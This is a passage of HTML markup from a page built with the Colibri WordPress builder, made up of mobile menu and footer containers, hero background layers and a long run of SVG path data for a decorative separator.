text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-256-image style-local-22-h14-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"offscreen-content\">\n <!---->\n <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n </div>\n </div>\n <div class=\"offscreen-footer h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-257 style-local-22-h15 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-258-outer style-local-22-h16-outer\">\n <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>© 2022</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay style-local-22-h9-offscreenOverlay\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-212 style-local-22-h24 position-relative\">\n <div class=\"background-wrapper\">\n <div class=\"background-layer background-layer-media-container-lg\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container-md\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n </div>\n <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n <svg style=\"fill:white;\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n <path d=\"M393.1,112.4c-.9.3,2.5.4,4.7.5C399.4,112.6,398.4,112.3,393.1,112.4Z\"></path>\n <path d=\"M340.6,111.1c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C339.4,111.3,344.9,111.3,340.6,111.1Z\"></path>\n <path d=\"M313.3,110.2c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C309.5,110.3,312.9,110.4,313.3,110.2Z\"></path>\n <path d=\"M317.1,108.2c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C309.8,107.9,313.6,108.4,317.1,108.2Z\"></path>\n <path d=\"M326.8,108.1c-2.6.1-6.4,0-6.7.3C324.7,108.5,326.8,108.4,326.8,108.1Z\"></path>\n <path d=\"M540.9,113c4,.1,3.8-.2,3.7-.5C540.1,112.4,540.3,112.7,540.9,113Z\"></path>\n <path d=\"M320.1,106.8a37.78,37.78,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C320.3,107.4,318.6,107.3,320.1,106.8Z\"></path>\n <path d=\"M361,107.5c-.4.3-7.1.6.8.9C359.5,108,365.2,107.8,361,107.5Z\"></path>\n <path d=\"M368.1,104.5c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C371.8,104.4,366.8,104.2,368.1,104.5Z\"></path>\n <path d=\"M354.9,102.2c-2.7-.1-3,.1-5.6,0,5.3.5-1.8,1.5,4.3,1.7.2-1.1,1.6-1.1,3.6-2.2C350.1,101.5,349.6,101.6,354.9,102.2Z\"></path>\n <path d=\"M359,100.5c-5.3,0-4.4.6-6.1,1C359.4,101.6,357.9,100.9,359,100.5Z\"></path>\n <path d=\"M87.7,93.8c-5.6-.2-1.5,1.4-.4,1.1C87.3,94.2,86.8,94.2,87.7,93.8Z\"></path>\n <path d=\"M388.4,99.2a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C389.7,100.1,391.9,99.5,388.4,99.2Z\"></path>\n <path d=\"M308,97.8c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C310.9,97.7,311.5,98,308,97.8Z\"></path>\n <path d=\"M475.7,100.5c0,.2-3.8.8,2.2.9C476.8,101.2,478.9,100.7,475.7,100.5Z\"></path>\n <path d=\"M369.5,98.2c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C378.9,98.6,369,97.9,369.5,98.2Z\"></path>\n <path d=\"M112,92.9c0-.4,1.8-.7,1.8-1.2C110,91.7,108,92.8,112,92.9Z\"></path>\n <path d=\"M465,99.5c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C462.7,99.7,465.9,99.8,465,99.5Z\"></path>\n <path d=\"M382.4,97.1c-.5.3-2.3.7,1,1.1C383.6,98.1,386.1,97.5,382.4,97.1Z\"></path>\n <path d=\"M375,96.6c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1A24.16,24.16,0,0,0,375,96.6Z\"></path>\n <path d=\"M360.5,97.5c.2-.4,2.6-1-1.3-1.4C359.1,96.6,355.4,97,360.5,97.5Z\"></path>\n <path d=\"M137.1,91.4c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C145.1,91.6,139.2,91.1,137.1,91.4Z\"></path>\n <path d=\"M119,89.8c2.2.2,4.2.6,2,.7a26.11,26.11,0,0,1,2.8.1c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5C122.6,90,119.9,89.5,119,89.8Z\"></path>\n <path d=\"M305.8,93.8c-.6.5,7.3.4,10,.3C312.4,93.7,308.9,94.1,305.8,93.8Z\"></path>\n <path d=\"M383.2,94.8c4.5-.5,2,.4,6,.5.2-.5-1.5-.8-7.8-.9C381.8,94.5,381.2,94.8,383.2,94.8Z\"></path>\n <path d=\"M312.9,90.7c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C309.3,91.2,313.2,91.2,312.9,90.7Z\"></path>\n <path d=\"M477.8,95.1c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C476.5,95.3,476.8,95.2,477.8,95.1Z\"></path>\n <path d=\"M320.4,91.3c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C320.8,91.7,324.3,91.5,320.4,91.3Z\"></path>\n <path d=\"M122.5,85.9c.2.3-4.3.8.9,1C122.6,86.6,126.8,86.2,122.5,85.9Z\"></path>\n <path d=\"M311.1,90.3c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C303.4,89.8,308.8,89.9,311.1,90.3Z\"></path>\n <path d=\"M163.4,85.1c4.8.2,7.4-.4,2.2-.6C163.8,84.6,165.2,85,163.4,85.1Z\"></path>\n <path d=\"M422,90c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C418.8,90.3,425.8,90.5,422,90Z\"></path>\n <path d=\"M315,86.9c-5.7-.1-11.4.9-5.9,1.2-1.1-.3.2-.4,4-.2C307.8,87.2,319.7,87.3,315,86.9Z\"></path>\n <path d=\"M321.2,86c3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.4.2-2.5.7,2.2.9,1.4-.6,2,.4,7.2.3C326.4,86.9,326.5,85.9,321.2,86Z\"></path>\n <path d=\"M352.5,86.8c-1.5-.7-5.1,0-8.8-.5,1.6.5-.5.8,3.6,1C346,86.8,349.2,86.5,352.5,86.8Z\"></path>\n <path d=\"M500.2,90.5c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A25,25,0,0,1,500.2,90.5Z\"></path>\n <path d=\"M359,86.3c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C362.5,85.8,360.3,86,359,86.3Z\"></path>\n <path d=\"M474.6,88.3c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A37.42,37.42,0,0,0,474.6,88.3Z\"></path>\n <path d=\"M147.8,78.4c1.8-.3-4.9-.2-4.5-.4,6.3-.1-3.5-.6,2.3-.6-2.7,0-3.2-.2-5.8-.2.5.9,3.7,1.5-1.1,1.9,4.5.4,2,1.2,7,1.6,0-.5,1.5-1.1-1.6-1.8,1.4-.2,6.1.4,5.5-.1C146.3,78.7,142.1,78,147.8,78.4Z\"></path>\n <path d=\"M317,84.4c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C315.3,84.2,312.8,84.2,317,84.4Z\"></path>\n <path d=\"M265.7,81.4c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C267.7,82.1,268.8,81.5,265.7,81.4Z\"></path>\n <path d=\"M182.7,80.2c-4.1-.3-1.3-1-6.7-1.2C177.3,79.3,176.1,79.8,182.7,80.2Z\"></path>\n <path d=\"M238.5,80.4c1.8.3-3.8.4.6.7-1-.4,3.6-.2,3.8-.5C240.9,80.6,239.7,80.5,238.5,80.4Z\"></path>\n <path d=\"M335.4,83.2c4.5.2,7.8-.1,3.9-.4C338.9,83,333.8,82.8,335.4,83.2Z\"></path>\n <path d=\"M118,77.6a10.17,10.17,0,0,1-2.7,0q0,.45,3.3.6C116.8,78,122.4,77.9,118,77.6Z\"></path>\n <path d=\"M126.7,78c3.7.1,4.6.4,8.8.5-.2-.3-1.8-.6-4.8-.8C130.7,78,126,77.8,126.7,78Z\"></path>\n <path d=\"M308.8,81.4c-.8.3-1,.4,2,.7-1.6-.4,3.5-.1,3.9-.3C310.3,81.8,311.1,81.5,308.8,81.4Z\"></path>\n <path d=\"M246.7,80.3c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C253.5,80.5,245.4,80,246.7,80.3Z\"></path>\n <path d=\"M173.5,77.7c5.8.1,1,.9,5.1,1.1,1.8-.6,3.6-1.6-3.4-2.3-4.1.2,3.1.7,2.4,1.1A37.48,37.48,0,0,0,173.5,77.7Z\"></path>\n <path d=\"M315.9,81.5c0-.3,2.2-.4,2.1-.7C314.1,80.7,312.8,81.3,315.9,81.5Z\"></path>\n <path d=\"M351.3,82.2c.3-.4,1.3-.5-3.4-.7C348.9,81.7,346.2,82.2,351.3,82.2Z\"></path>\n <path d=\"M220.8,79.3c.6-.2,3.2-.2,2.2-.6C219.9,78.7,215.9,79.1,220.8,79.3Z\"></path>\n <path d=\"M152.4,77.3c1.7-.3,1.1-.6-3.5-.8C149,76.8,150,77.1,152.4,77.3Z\"></path>\n <path d=\"M347.3,79.3c-5-.2-2.6.8-.6.9C349,79.9,345.9,79.7,347.3,79.3Z\"></path>\n <path d=\"M139.5,75.2c3.9,0,3.8.2,7.2.3C147.6,75.1,139.3,74.8,139.5,75.2Z\"></path>\n <path d=\"M172.1,74.5c2.1.1,2.6.2,4.5.3-2.4-.6-2-.8-3.9-1.3C172.9,73.9,170.7,74,172.1,74.5Z\"></path>\n <path d=\"M130.5,72.9c1,.3,3.1.5,4.8.8C135.1,73.3,135.5,72.9,130.5,72.9Z\"></path>\n <path d=\"M390.3,79.2c-.3-.4,3.6-.4,5-.7C389,78.2,386.2,78.8,390.3,79.2Z\"></path>\n <path d=\"M218.2,74.8c4.3.1,5.6-.7,1.9-1C221.2,74.2,214.3,74.4,218.2,74.8Z\"></path>\n <path d=\"M177.5,72.7c.3.3.5.6.8.9C183.5,73.7,183.6,72.9,177.5,72.7Z\"></path>\n <path d=\"M149.2,72.1c-3.4-.1-3.5-.4-6.1-.6,1.5.6,1.7,1.2,8.3,1.5C152,72.6,143.3,72.2,149.2,72.1Z\"></path>\n <path d=\"M128,71.6c3.6-.2-3.4-.8.5-1-3.8,0-3.1-.3-5.9-.4C125.5,70.9,122.7,71.1,128,71.6Z\"></path>\n <path d=\"M146.2,70.3c-4.5-.1-2.4.4-5.2.4,3.4.1,1.8.5,4.7.7a11.09,11.09,0,0,1,2.7,0c-3.1-.6,1.1,0,2.4-.4C146.9,70.6,144,70.8,146.2,70.3Z\"></path>\n <path d=\"M431.6,77.4a4.41,4.41,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C430.2,77.2,428,77.6,431.6,77.4Z\"></path>\n <path d=\"M407.6,76.8c.4-.3,4.1-.4,3.5-.8C407.2,76,405.6,76.7,407.6,76.8Z\"></path>\n <path d=\"M315.5,74.8c.8-.4-3.7-.6-.7-.8C310.2,73.7,311.1,74.8,315.5,74.8Z\"></path>\n <path d=\"M229.6,72c1.7.1,4,.1,4.4.2s0,.3,1.7.4c1.7-.3-1.2-.6-3.6-1C231.6,71.7,227.7,71.6,229.6,72Z\"></path>\n <path d=\"M144.8,70.2c-2.6-.4,5.6-.3.8-.6-1.3.1-2.6.2-4,.2.2-.2-.7-.4-3.2-.5-.4.3,3.5.5.6.7A53.44,53.44,0,0,1,144.8,70.2Z\"></path>\n <path d=\"M421.4,75.2c-4.3-.1-5.3.1-8.2.1a10.34,10.34,0,0,0,3.3.6C416.9,75.6,422.5,75.7,421.4,75.2Z\"></path>\n <path d=\"M380.2,74c-.8.3-1.1,1,5.2,1.2C383.3,74.9,382.7,74.4,380.2,74Z\"></path>\n <path d=\"M372.6,75c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C370.8,74.9,369.7,74.7,372.6,75Z\"></path>\n <path d=\"M441.1,75.5a45.38,45.38,0,0,0,4.9.9C448.4,76.2,447.3,75.5,441.1,75.5Z\"></path>\n <path d=\"M152,69c-1.1.2-5.6,0-3.8.5,2.1,0,5.3.2,5.6,0-1.1-.1-2.8-.1-2.9-.2C150.6,69.2,156.8,69.2,152,69Z\"></path>\n <path d=\"M366.4,74.2c-1-.3,5.6-.5-2-.7C365.4,73.7,363.2,74.1,366.4,74.2Z\"></path>\n <path d=\"M126.5,68.3c.3.1,0,.3,1.7.4.2-.3,4.1-.2,5.3-.3C130.2,68.3,128,68.3,126.5,68.3Z\"></path>\n <path d=\"M405.8,74.7c2.5-.2,5-.1,2.3-.5C404.5,74.1,402.6,74.6,405.8,74.7Z\"></path>\n <path d=\"M154.1,68.3c-.2.2-5.2,0-5.4.2,5.2,0,2.6.5,7.4.5C155.2,68.8,157.3,68.4,154.1,68.3Z\"></path>\n <path d=\"M188.2,69.1c-7.4-.3-2.7.8.4.4C185,69.4,187.8,69.1,188.2,69.1Z\"></path>\n <path d=\"M450,74.5c1,.4,2.4.7,6.4.9A26.64,26.64,0,0,0,450,74.5Z\"></path>\n <path d=\"M142.7,67.8c.6.2,12.2.6,7.1.2,0,.1-.1.1-1.3.1-.3-.1,0-.3-1.7-.4C146.8,67.9,142.9,67.7,142.7,67.8Z\"></path>\n <path d=\"M184.6,68.1c-6.5,0-5.1.1-8.7-.4-.3.3-.2.4-3.7.6,4.4.2,5.8.1,10.1.4,1.5-.1,1.4-.2-.4-.4C183.6,68.3,185.2,68.3,184.6,68.1Z\"></path>\n <path d=\"M153.3,67.3c-4.5-.2-5.7,0-6.8.2,2.5,0,4.4.1,5.8.2C151.7,67.5,153.6,67.5,153.3,67.3Z\"></path>\n <path d=\"M287.9,70.2c-3-.2-5.8-.4-8.8-.5C278.3,70,286.9,70.4,287.9,70.2Z\"></path>\n <path d=\"M409.8,73c.8-.3,1.6-.6-2.1-.8C409.2,72.6,404.2,72.7,409.8,73Z\"></path>\n <path d=\"M47.3,63.6c-.3.3-3.9.2-3.7.6C46.9,64.2,51,63.9,47.3,63.6Z\"></path>\n <path d=\"M126.3,64.9a22.4,22.4,0,0,0,4.8.8c-.1-.1,2.4,0,2.7-.2C129.7,65.4,130.9,65,126.3,64.9Z\"></path>\n <path d=\"M45.5,63.1a23.75,23.75,0,0,1,2.8.1c-1-.4,3-.6-3.5-.8-.2.4,3.1.6-.8.6C44.8,63,45.6,63,45.5,63.1Z\"></path>\n <path d=\"M337.1,69.4c-2.2-.5,4.5-.2,5.2-.4C338.5,68.4,330.4,69.2,337.1,69.4Z\"></path>\n <path d=\"M267.4,65.9a10.66,10.66,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3C264.3,66.9,272.2,66.3,267.4,65.9Z\"></path>\n <path d=\"M49.3,61.1c-5-.2-1.1.5-5.2.4,2.2.2,6.4.2,6.1.6-3.8,0-3-.3-5.9-.4.8.6,7.8.6,10.1.3C50,61.9,49.2,61.6,49.3,61.1Z\"></path>\n <path d=\"M411.5,70.2c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C408.2,69.8,409.3,70,411.5,70.2Z\"></path>\n <path d=\"M127.1,62.8c-2,.1-8.6.3-3.6.7C121.5,63,131.3,63.1,127.1,62.8Z\"></path>\n <path d=\"M242.9,64.9c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C245.7,65.1,247.4,65.1,242.9,64.9Z\"></path>\n <path d=\"M254.7,65.6c2,.1,2.5.2,4.4.3-2.4-.5-.6-.7.4-1.1C255,64.9,253.7,65.1,254.7,65.6Z\"></path>\n <path d=\"M408.6,68.5c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C413.4,68.8,411.6,68.6,408.6,68.5Z\"></path>\n <path d=\"M312.4,66.5c.8-.4-2.8-.5-4.9-.8C304.3,66,309.5,66.3,312.4,66.5Z\"></path>\n <path d=\"M214.1,63.7a54.5,54.5,0,0,0-7,0c2.3.1,1.1.3,3.1.4.1-.1-.5-.3,1.1-.3C213.1,63.9,214.4,64,214.1,63.7Z\"></path>\n <path d=\"M345.5,66.3c-.6-.3-4.5.8.7.8C349.2,66.9,344.7,66.6,345.5,66.3Z\"></path>\n <path d=\"M255.4,64.9c2.3-.2-.1-1-3.4-.7C256.5,64.4,249,64.7,255.4,64.9Z\"></path>\n <path d=\"M365.6,66.9c-4,.1-13.3-.4-14-.1C353.2,66.8,366.6,67.6,365.6,66.9Z\"></path>\n <path d=\"M149.8,61.8c-.4.3,2.2.5,4.7.7C154.5,62.1,154.2,61.8,149.8,61.8Z\"></path>\n <path d=\"M106.4,61.3c-2.3-.4,5.9-.4.7-.7.3.2-.9.2-2.7,0C105.4,60.8,103.3,61.2,106.4,61.3Z\"></path>\n <path d=\"M335.9,66.4c4.3.2,5.7-.3,2.3-.5C337.8,66.1,335.4,66.1,335.9,66.4Z\"></path>\n <path d=\"M65.7,59.3c1.9.6-.8.7,3.7,1.1C69.3,60,68.7,59.6,65.7,59.3Z\"></path>\n <path d=\"M56.2,59.5c4.4.1,4.7.5,7.6.7C65.4,59.8,58.3,59.3,56.2,59.5Z\"></path>\n <path d=\"M59.6,57.1c-2.1,0-5.3-.2-5.6,0,6.7.2,3.9.9,8.1,1.3,1-.4,6.1.4,1.8.5,1.9,0,3.1.1,4.3.2,2.3-.1-1.6-.4-.7-.8C60.9,58.1,63.4,57.4,59.6,57.1Z\"></path>\n <path d=\"M38.7,57c2.2.5.4,1.2,6.8,1.5C39.5,57.8,46.5,57.5,38.7,57Z\"></path>\n <path d=\"M116.7,58.8c4.6.5,2.4,1,6.6,1.2-2.1-.5,1.9-.4,2.2-.7C120.5,59.3,121.1,58.9,116.7,58.8Z\"></path>\n <path d=\"M105.5,58.7c.1.4,5.3.5,7.6.7A53.68,53.68,0,0,0,105.5,58.7Z\"></path>\n <path d=\"M269.6,62c2.2.4-7,.5.7.8C268.8,62.5,274,62.3,269.6,62Z\"></path>\n <path d=\"M151.7,59.2a15.43,15.43,0,0,0,4.9.8C153.3,59.5,158.6,59.4,151.7,59.2Z\"></path>\n <path d=\"M332.9,62.9c.4.3,1.3.5,3.4.7,1.6-.2-.4-.2.9-.5C335.3,63.1,334,63,332.9,62.9Z\"></path>\n <path d=\"M253.4,61c2,0,3.2.1,4.4.2,0-.1.2-.3,2.6-.2a9.4,9.4,0,0,0-3.2-.5A19.4,19.4,0,0,1,253.4,61Z\"></path>\n <path d=\"M104.2,57.2a34.16,34.16,0,0,0-6.7.3C102.2,57.7,104.2,57.5,104.2,57.2Z\"></path>\n <path d=\"M33.6,54.3c3.4.5-.7,1,3.9,1.3C35.6,55,41.5,54.6,33.6,54.3Z\"></path>\n <path d=\"M140.1,57c7.7.1,4.9-.6.5-1C142,56.5,139.8,56.6,140.1,57Z\"></path>\n <path d=\"M344,61.3c1.8-.1,8.3-.4,2.1-.7,1.1.3-.2.4-4,.2C342.5,61,342,61.2,344,61.3Z\"></path>\n <path d=\"M88.8,53.9c2.3.5-2.1,1.3,2.6,1.4C89.3,54.7,94.7,54.3,88.8,53.9Z\"></path>\n <path d=\"M193.6,56.3a38.23,38.23,0,0,0,6.3.8C199.3,56.7,198.3,56.4,193.6,56.3Z\"></path>\n <path d=\"M95.7,53.9a9.77,9.77,0,0,0-3.5-.8C90.8,53.1,92.2,53.7,95.7,53.9Z\"></path>\n <path d=\"M343.9,58.2c-3.5-.1-6.8-.1-8.6-.3,1.9.3,6.3.5,9,.7C344.2,58.5,344.1,58.3,343.9,58.2Z\"></path>\n <path d=\"M200.4,54.5c-1.8.1-2,.7,2.1.8C199,54.9,204.1,54.8,200.4,54.5Z\"></path>\n <path d=\"M306.6,56.8c.2.3,1.2.6,3.5.8C309.6,57.3,310.7,56.9,306.6,56.8Z\"></path>\n <path d=\"M298.8,55.8c.9.5-4.5,0-7,0-.6.2-2.7.3-3.8.5,4.2-.2,14.1.2,16.5-.2C302.1,56,300.1,55.9,298.8,55.8Z\"></path>\n <path d=\"M204.6,53.1c-5,0-.6-.7-6.2-.7C198.2,52.7,202.3,53.3,204.6,53.1Z\"></path>\n <path d=\"M110.7,50.4a52.3,52.3,0,0,0-5.6,0c0,.3.2.5,3.3.6C107.5,50.6,110.1,50.6,110.7,50.4Z\"></path>\n <path d=\"M308,55.2c-1.5-.6-7.4-1.1-1-1.1-4.2-.3-11.5-.3-14.5-.7l.2.2c4.2.2,8,.5,10.4.8C297.7,54.4,304.6,55,308,55.2Z\"></path>\n <path d=\"M265.3,54.1c4.3.2,5.7-.3,2.3-.5C267.3,53.8,263.8,53.7,265.3,54.1Z\"></path>\n <path d=\"M29.6,48.2c.9.2-1.2.5,1.9.6C32.3,48.6,36.7,48.4,29.6,48.2Z\"></path>\n <path d=\"M333.9,54.7c-2.8.1-.5.9,3.6,1C337.4,55.1,338.3,55,333.9,54.7Z\"></path>\n <path d=\"M113.1,49.9c-.4.3,1.7.5,6,.6C120.5,50.1,115,50.1,113.1,49.9Z\"></path>\n <path d=\"M345.4,55c-1.9-.1-2.8-.2-5.8-.2.2.2.3.4.5.6C343.7,55.4,345.4,55.3,345.4,55Z\"></path>\n <path d=\"M134.1,50.2c3,.1.8.5,4.4.3.3.1,0,.3,1.7.4C144.3,50.7,135.5,50,134.1,50.2Z\"></path>\n <path d=\"M343.3,54.2c-4.7-.2-.8.3-5.5.1-.4-.2.2-.4-1.8-.5.2.2.3.4.5.6,2.1.1,3.7.2,5.9.4C340.9,54.4,344.1,54.5,343.3,54.2Z\"></path>\n <path d=\"M281.2,53.1c-2.1-.2-.1-.7-4.8-.8C276.7,52.7,276.8,53.1,281.2,53.1Z\"></path>\n <path d=\"M266.4,52.2c-2.5,0-4.4-.1-5.8-.2,1.8.2,4.6,1,7.6.7C266.1,52.6,266.7,52.3,266.4,52.2Z\"></path>\n <path d=\"M165.1,49.1c-.9,0-1.7,0-1.3.1,3.8.2.9.7.8.9,4.8,0,3.9-.4,6.4-.6-5.2-.1-3.4.1-3-.3C166.9,49.2,166,49.1,165.1,49.1Z\"></path>\n <path d=\"M356.2,53.1c-1.9-.1-2.8-.2-5.8-.2q0,.45,3.3.6C353.5,53.2,357.5,53.4,356.2,53.1Z\"></path>\n <path d=\"M280.7,51.1c-3.1,0-4.9.1-5.3.3,2,0,3.2.1,4.4.2C278.3,51.2,281.5,51.3,280.7,51.1Z\"></path>\n <path d=\"M304.1,50.8c-3.5,0-5.6.1-8.2.1,2.1.1,1.5.3,1.8.5,2,.2,5.3.2,7.3.4l-.4-.4a36.81,36.81,0,0,1-4.2-.1l-.2-.2C302.8,51.3,305.1,51.2,304.1,50.8Z\"></path>\n <path d=\"M352.3,51.9c-4.7-.1-5.3.2-6.5.5,2.6,0,3.2.2,5.8.2C350.5,52.2,349.2,52.1,352.3,51.9Z\"></path>\n <path d=\"M289.7,50.2c-4.5,0-2.3-.4-5.9-.5C282.9,50.1,288.5,50.6,289.7,50.2Z\"></path>\n <path d=\"M362.9,51.3c-4.3,0-4.3-.3-8.6-.3C354.5,51.3,363.5,51.6,362.9,51.3Z\"></path>\n <path d=\"M344.4,50.7c3.4-.3-.7-1.2,4.4-1.3,0-.3-2.5-.4-4.6-.5C347.9,49.5,339.4,50.2,344.4,50.7Z\"></path>\n <path d=\"M363.6,50.5c-4,.1-9.2.1-2.4.4.1.1.3.1,1.5.1C361.3,50.7,364.5,50.8,363.6,50.5Z\"></path>\n <path d=\"M356.6,48.8c.3.3-2.2.3-.8.6,3.5.1,6.9.2,6.9-.1-1.7-.1-4-.1-4.4-.2A4.48,4.48,0,0,0,356.6,48.8Z\"></path>\n <path d=\"M341.9,48c.8.2.9.5,4.6.5C349,48.4,345.8,48.1,341.9,48Z\"></path>\n <path d=\"M349.2,48.3c1.9,0,3.8.1,5.7.1-.2-.2-.3-.4-.5-.6C349.1,47.7,348.3,48,349.2,48.3Z\"></path>\n <path d=\"M38.1,40.6c-4.5-.1-7.1.3-2.3.5C34.4,40.7,39.5,40.9,38.1,40.6Z\"></path>\n <path d=\"M294.9,46.7c6.2.2,3.3-.4,3.5-.8C291.1,45.8,297.4,46.3,294.9,46.7Z\"></path>\n <path d=\"M354.2,47.7c1.4-.2,4.4-.3,5.1-.5C355.5,47.1,350.1,47.4,354.2,47.7Z\"></path>\n <path d=\"M259.6,44.5c5.7-.1,11.3.5,15.6.4-4.3-.2,1.2-.2-.4-.4-4.4-.1-8.4.2-11.3-.3C264.2,44.4,258.1,44.1,259.6,44.5Z\"></path>\n <path 